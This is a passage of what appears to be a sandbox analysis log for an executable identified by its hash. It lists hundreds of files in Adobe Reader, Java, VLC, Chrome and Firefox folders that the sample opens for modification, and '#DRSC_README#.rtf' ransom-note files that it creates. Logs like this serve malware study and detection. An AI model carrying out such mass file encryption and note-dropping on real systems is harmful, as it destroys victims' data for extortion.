C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fontconfig.bfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\calendars.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunec.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_delete_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\3RDPARTY 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ja_JP.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\move.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jconsole.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunjce_provider.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_ko.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConfirmRequest.DVR 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-no-text_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files 